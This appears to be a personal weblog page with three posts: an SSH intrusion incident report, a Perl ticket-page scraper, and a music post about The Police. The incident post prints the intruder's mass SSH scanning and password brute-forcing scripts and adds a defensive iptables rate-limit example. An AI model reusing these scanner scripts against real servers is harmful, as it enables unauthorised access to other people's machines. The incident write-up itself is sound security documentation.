Parsed Participle

The personal weblog of Faiz Kazi: Mostly oddities in programming, life in Japan, occasionally music.

[ Home | RSS 2.0 | ATOM 1.0 ]

19 Nov 2007

Sod off, loathsome script-kiddie

Someone (or should I say something, because this looks like some auto-scanning script) gained access via SSH using one of the unused user accounts on this server. Nothing very spectacular, especially since everything was easily visible with ps, and even who. The IP seems to be 86.123.17.188.

I could see this when I ran who:

faiz     pts/3        Nov 19 13:56 (p02a702.tokynt01.ap.so-net.ne.jp)
vasanth  pts/2        Nov 18 23:37 (86.123.17.188:S.0)

Looks like it never got beyond that, though I saw some hundreds of './ssh' processes running. After summarily killing them off, I found and archived the offending scripts: these were stored in, and running from, the directory /var/tmp/vi.recover/irc/ as the user 'vasanth'. I suspect a weak password led to a brute-force SSH break-in. Not at all a bother, and nothing that can't be fixed by an iptables '-m recent' filter.
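For the '-m recent' filter mentioned above, here is an added example of what such a rate limit looks like (it is not the blog's own rule set); the chain name SSH_LIMIT, the list name sshbf and the 4-connections-per-60-seconds threshold are assumptions, and DRY_RUN=1 prints the rules instead of applying them:

```shell
#!/bin/sh
# Rate-limit new SSH connections per source address with the iptables
# 'recent' match. Added example, not the blog's own rules; SSH_LIMIT,
# sshbf and the thresholds are assumptions, adjust them to taste.
SSH_PORT="${SSH_PORT:-22}"
WINDOW="${WINDOW:-60}"   # seconds
HITS="${HITS:-4}"        # new connections from one source per WINDOW

# Wrapper so the rules can be previewed without root (DRY_RUN=1).
run() {
    if [ -n "${DRY_RUN:-}" ]; then
        printf '%s\n' "iptables $*"
    else
        iptables "$@"
    fi
}

add_ssh_ratelimit() {
    # A dedicated chain keeps the policy easy to flush and re-apply.
    run -N SSH_LIMIT 2>/dev/null || true
    run -F SSH_LIMIT
    # Record the source of every new SSH connection in the 'sshbf' list.
    run -A SSH_LIMIT -m recent --name sshbf --set
    # Log (rate-limited, so a scanner cannot flood syslog) and then drop a
    # source that opened HITS or more new connections within WINDOW seconds.
    # --update refreshes the timestamp, so a host that keeps hammering stays
    # blocked until it backs off for a full WINDOW.
    run -A SSH_LIMIT -m recent --name sshbf --update --seconds "$WINDOW" \
        --hitcount "$HITS" -m limit --limit 3/min -j LOG --log-prefix "ssh-bruteforce: "
    run -A SSH_LIMIT -m recent --name sshbf --update --seconds "$WINDOW" \
        --hitcount "$HITS" -j DROP
    run -A SSH_LIMIT -j ACCEPT
    # Only new TCP connections to the port enter the chain; insert it at the
    # top of INPUT so no earlier blanket ACCEPT for the port bypasses it.
    run -I INPUT 1 -p tcp --dport "$SSH_PORT" -m conntrack --ctstate NEW -j SSH_LIMIT
}

# Apply (as root) with: sh ssh-ratelimit.sh apply
if [ "${1:-}" = "apply" ]; then
    add_ssh_ratelimit
fi
```

The recent match counts connection attempts, not failed logins, so a slow scanner that stays under the threshold still gets through; it complements, rather than replaces, key-only authentication and removing unused accounts like the one abused here.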

Contents of the directory the intruder was running the scripts from:
var/
`-- tmp
    `-- vi.recover
        `-- irc
            |-- 1
            |-- 10
            |-- 11
            |-- 12
            |-- 13
            |-- 14
            |-- 15
            |-- 16
            |-- 17
            |-- 18
            |-- 19
            |-- 2
            |-- 20
            |-- 209.85.ps.22
            |-- 21
            |-- 22
            |-- 23
            |-- 24
            |-- 25
            |-- 26
            |-- 27
            |-- 28
            |-- 29
            |-- 3
            |-- 30
            |-- 31
            |-- 32
            |-- 33
            |-- 34
            |-- 35
            |-- 36
            |-- 37
            |-- 38
            |-- 39
            |-- 4
            |-- 40
            |-- 41
            |-- 42
            |-- 43
            |-- 44
            |-- 45
            |-- 46
            |-- 47
            |-- 48
            |-- 49
            |-- 5
            |-- 50
            |-- 51
            |-- 52
            |-- 53
            |-- 54
            |-- 55
            |-- 56
            |-- 57
            |-- 58
            |-- 59
            |-- 6
            |-- 60
            |-- 61
            |-- 62
            |-- 63
            |-- 64
            |-- 7
            |-- 8
            |-- 9
            |-- all
            |-- common
            |-- full
            |-- go.sh
            |-- mfu.txt
            |-- pass_file
            |-- ps
            |-- r00t
            |-- skan
            |-- ss
            |-- ssh
            `-- x

Some samples from the scripts. Note: though no harm can come if you try running these binaries as a non-root user (if you are running Linux, that is), it's probably a good idea not to run the scripts in this archive - there's no easy way to be sure what they actually do.

$ cat /var/tmp/vi.recover/irc/go.sh
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan
rm -f bios.txt

#!/bin/bash

clear

rm -rf $1.ps.$2

echo "#=====#==================================#=====#"
echo "#= R =# SSH AUTO SCANNER BY REGELE & CO  #= R =#"
echo "#= E =#-------   #BlackCat TEAM   -------#= E =#"
echo "#= G =#----------------------------------#= G =#"
echo "#= E =# � ALL RIGHTS RESERVED TO Regele �#= E =#"
echo "#= L =#   Now Just Sit Back End Relax    #= L =#"
echo "#= E =#   IPs founder... ACTIVATING!!!   #= E =#"
echo "#Range from -> $1.0.0"
echo "#Range   to -> $1.255.255"
echo "#Looking on -> PORT $2"

./ps $1 $2

sleep 5

cat $1.ps.$2 |sort |uniq > mfu.txt

oopsnr2=`grep -c . mfu.txt`

sleep 5
echo "#---Relax ... Take it Easy---#"

cat 1 > pass_file
sleep 3
./ssh 150

cat 2 > pass_file
sleep 3
./ssh 150

#... and so on

echo "# It's over, you cand go outside and play now #"

Yup, script 'kiddie' all right.

posted: 11:55 | path: /security | permanent link to this entry

Screen Scraping in this Day And Age

... of RSS, Web2.0 and whatnot. As much as I loved doing it back in old days, screen-scraping (parsing HTML off of web pages with a lot of guesswork) was (and is) yucky. I suppose I enjoyed it back then because I ended up learning a bit of Awk, and later Perl.

But since I've found no good way to avoid missing concerts, other than hoping that there's an RSS feed with ticket/date information for bands/artists that I don't want to miss, I have to resort to such nonsense now and then:

use strict;
use warnings;
use LWP::Simple 'get';
use HTML::TableExtract;
use Data::Dumper;

use constant STATUS => 5;  # The 5th column of table happens to be 'ticket status'

my $te = HTML::TableExtract->new;
# slurp! (get returns undef on a failed fetch, so bail out rather than parse nothing)
my $html = get 'https://tickets.thepolice.com/'
    or die "Whoa! couldn't fetch the ticket page";
$te->parse($html);

my ($table) = $te->tables;             # The first and only table in the
                                       # page is a list of all gigs by city,
                                       # date, and ticket availability
die "Whoa! no table on the page??" unless $table;

my @tokyo_gigs = grep {
                    grep { defined($_) && /Tokyo/ } @$_  # Rows with dates in Tokyo
                 } $table->rows;

# Look out for any changes; at this time, there are only 2 shows in Tokyo
die "Whoa! no gigs in Tokyo??"    unless @tokyo_gigs;
die "Whoa! *more* gigs in Tokyo??"    if @tokyo_gigs > 2;
die "Whoa! only *one* gig in Tokyo??" if @tokyo_gigs == 1;

# ... and if their status is anything other than 'Coming Soon',
# then either tickets sales have begun, or... are already sold out!
# (an empty status cell counts as a change too)
print "Whoa! somethings up!\n", Dumper @tokyo_gigs
    if grep { !defined($_) || !/coming soon/i }
       map { $_->[STATUS] } @tokyo_gigs;

This is just so I don't miss The Police live at the Tokyo Dome, scheduled in February, 2008.

So having to screen-scrape may suck, but at least there's Perl.

UPDATE: Nov 21, 21:00 JST: Looks like it worked! Well, sort of. I put the script in my crontab and this morning it sent me a mail with "Whoa! no gigs in Tokyo??" in the body; and sure enough, it seems that the presale Tokyo tickets status had changed - a link that said "Buy Tickets" is in its place.

(Of course, it's a totally different issue that the site in question does not seem to let one purchase tickets for the Tokyo venues - how lame! Well, at least I am early enough to buy the 'general public' tickets on time.)

posted: 07:58 | path: /programming | permanent link to this entry

THE POLICE 2007 World Tour

I suppose one could call me a fan. After years of not listening to classic rock, leave aside The Police, I suddenly find myself buying all their classic albums. In fact, I just bought almost all of them. Amazon is evil, I tell you, with their accursed 'Customers who purchased this item also purchased...' feature:
  • Reggatta de Blanc
  • Ghost in the Machine
  • Zenyatta Mondatta
  • Synchronicity
Only Outlandos d'Amour is needed now, to complete a full collection of all the band's studio albums.

And, what timing: 2007 sees Sting, Andy Summers and Stewart Copeland not only reuniting as the original 3-piece band, but with any luck, I get to see them live in Tokyo in February. If I buy the tickets on time that is. I have a horrible track record of missing out any good live music in a city that's not exactly deprived of it.

I must be a fan; I've spent all weekend watching YouTube videos of The Police, both clips from their 2007 world tour and the old music videos from the early 80's.

I only hope they don't get completely bored of playing the same songs over and over again by the time they get here.

posted: 07:24 | path: /music | permanent link to this entry


